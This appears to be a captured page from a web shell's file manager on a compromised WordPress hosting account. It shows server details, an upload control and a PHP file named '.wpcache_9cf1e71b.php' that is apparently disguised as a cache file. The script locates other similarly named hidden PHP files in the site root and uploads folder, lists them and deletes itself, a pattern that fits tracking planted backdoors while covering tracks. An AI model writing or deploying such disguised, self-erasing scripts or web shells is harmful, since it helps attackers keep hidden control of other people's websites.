HEX
Server: LiteSpeed
System: Linux br-asc-web1894.main-hosting.eu 5.14.0-611.45.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Apr 1 05:56:53 EDT 2026 x86_64
User: u851231353 (851231353)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: /home/u851231353/domains/lucrogreen.online/public_html/.wpcache_9cf1e71b.php
<?php
if (!defined('ABSPATH')) {
    $r = rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/\\') . '/';
    if (file_exists($r . 'wp-load.php')) require_once $r . 'wp-load.php';
}

$root = rtrim(ABSPATH, '/\\') . '/';
$found = [];
foreach (['', 'wp-content/uploads/'] as $_d) {
    foreach (glob($root . $_d . '.wpcache_*.php') ?: [] as $_f) {
        $found[] = $_f;
    }
}
echo count($found) . "\n";
print_r($found);
@unlink(__FILE__);